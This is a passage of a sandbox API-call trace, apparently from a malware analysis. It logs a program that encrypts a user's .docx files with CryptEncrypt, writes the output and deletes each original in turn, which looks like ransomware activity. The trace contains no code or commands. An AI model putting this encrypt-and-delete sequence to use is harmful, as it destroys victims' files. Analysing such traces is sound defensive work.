out: lpsz="bool") returned 0x4 [0075.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0075.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caa90, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0075.484] CryptEncrypt (in: hKey=0x41ac200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x441c2c0*, pdwDataLen=0x144e790*=0x5a50, dwBufLen=0x5a60 | out: pbData=0x441c2c0*, pdwDataLen=0x144e790*=0x5a60) returned 1 [0075.484] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.484] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.484] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.484] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.484] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.484] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.484] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.484] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0075.484] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.484] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0075.484] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0075.484] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0075.484] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.484] PeekMessageW (in: lpMsg=0x144e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e734) returned 0 [0075.484] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0075.484] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0075.484] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.485] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.485] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.485] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.485] WriteFile (in: hFile=0x298, lpBuffer=0x4410e20*, nNumberOfBytesToWrite=0x5a60, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x4410e20*, lpNumberOfBytesWritten=0x144f194*=0x5a60, lpOverlapped=0x0) returned 1 [0075.487] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.487] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.487] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0075.487] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0075.487] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.487] PeekMessageW (in: lpMsg=0x144e96c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e96c) returned 0 [0075.487] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0075.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca580, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0075.487] CryptDestroyKey (hKey=0x41ac200) returned 1 [0075.487] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0075.487] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0075.487] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0075.487] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.487] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0075.487] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.487] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0075.487] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0075.487] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0075.488] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.488] PeekMessageW (in: lpMsg=0x144e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e944) returned 0 [0075.488] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0075.488] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0075.488] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0075.488] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0075.488] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.488] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.488] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0075.488] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.488] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0075.488] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0075.488] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0075.488] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.488] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0075.488] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0075.488] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.488] PeekMessageW (in: lpMsg=0x144ec54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec54) returned 0 [0075.488] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.488] PeekMessageW (in: lpMsg=0x144ec54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec54) returned 0 [0075.488] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0075.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797088, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0075.489] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0075.489] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0075.489] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.489] PeekMessageW (in: lpMsg=0x144ec54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec54) returned 0 [0075.489] FreeLibrary (hLibModule=0x756e0000) returned 1 [0075.489] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0075.489] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0075.489] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.489] CloseHandle (hObject=0x258) returned 1 [0075.489] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.489] CloseHandle (hObject=0x298) returned 1 [0075.491] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.491] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0075.491] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\16hIz1 tYfBoIcwVhJi.docx", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\16hIz1 tYfBoIcwVhJi.docx", lpFilePart=0x0) returned 0x32 [0075.491] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\16hIz1 tYfBoIcwVhJi.docx" (normalized: "c:\\users\\fd1hvy\\documents\\16hiz1 tyfboicwvhji.docx")) returned 0x20 [0075.492] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\16hIz1 tYfBoIcwVhJi.docx", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfeb1e850, ftCreationTime.dwHighDateTime=0x1d58c67, ftLastAccessTime.dwLowDateTime=0x8f874ac0, ftLastAccessTime.dwHighDateTime=0x1d5bf8d, ftLastWriteTime.dwLowDateTime=0x8f874ac0, ftLastWriteTime.dwHighDateTime=0x1d5bf8d, nFileSizeHigh=0x0, nFileSizeLow=0x5a50, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="16hIz1 tYfBoIcwVhJi.docx", cAlternateFileName="16HIZ1~1.DOC")) returned 0x41ac200 [0075.492] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\16hIz1 tYfBoIcwVhJi.docx" (normalized: "c:\\users\\fd1hvy\\documents\\16hiz1 tyfboicwvhji.docx")) returned 1 [0075.493] FindNextFileW (in: hFindFile=0x41ac200, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfeb1e850, ftCreationTime.dwHighDateTime=0x1d58c67, ftLastAccessTime.dwLowDateTime=0x8f874ac0, ftLastAccessTime.dwHighDateTime=0x1d5bf8d, ftLastWriteTime.dwLowDateTime=0x8f874ac0, ftLastWriteTime.dwHighDateTime=0x1d5bf8d, nFileSizeHigh=0x0, nFileSizeLow=0x5a50, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="16hIz1 tYfBoIcwVhJi.docx", cAlternateFileName="16HIZ1~1.DOC")) returned 0 [0075.493] FindClose (in: hFindFile=0x41ac200 | out: hFindFile=0x41ac200) returned 1 [0075.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0075.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0075.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0075.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0075.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d9b0 | out: hHeap=0x1780000) returned 1 [0075.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0075.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0075.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0075.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0075.494] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0075.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0075.494] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0075.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0075.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0075.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0075.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9938 | out: hHeap=0x1780000) returned 1 [0075.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0075.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0075.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0075.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0075.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0075.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19d20a8 | out: hHeap=0x1780000) returned 1 [0075.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0075.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0075.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c98f0 | out: hHeap=0x1780000) returned 1 [0075.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0075.494] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0075.494] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0075.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22e0 [0075.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0075.494] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0075.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0075.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0075.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0075.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2300 [0075.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0075.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c98f0 [0075.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0075.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0075.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0075.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0075.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0075.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0075.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0075.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0075.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0075.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0075.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0075.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b22250 [0075.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0075.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0075.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0075.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0075.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0075.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9920 [0075.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0075.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9938 [0075.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0075.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0075.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0075.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0075.495] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0075.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0075.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0075.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0075.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0075.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0075.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0075.496] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0075.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22e0 [0075.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0075.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0075.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0075.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0075.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0075.496] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\59kI0eZovuo4vI8.docx", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf873c8e0, ftCreationTime.dwHighDateTime=0x1d581e1, ftLastAccessTime.dwLowDateTime=0x4b1fe6e0, ftLastAccessTime.dwHighDateTime=0x1d5cfe5, ftLastWriteTime.dwLowDateTime=0x4b1fe6e0, ftLastWriteTime.dwHighDateTime=0x1d5cfe5, nFileSizeHigh=0x0, nFileSizeLow=0x6823, dwReserved0=0x10100c0, dwReserved1=0x8, cFileName="59kI0eZovuo4vI8.docx", cAlternateFileName="59KI0E~1.DOC")) returned 0x41ac540 [0075.496] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0075.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0075.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0075.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0075.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0075.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0075.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0075.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0075.496] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0075.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0075.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0075.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0075.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21e0 [0075.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0075.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0075.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 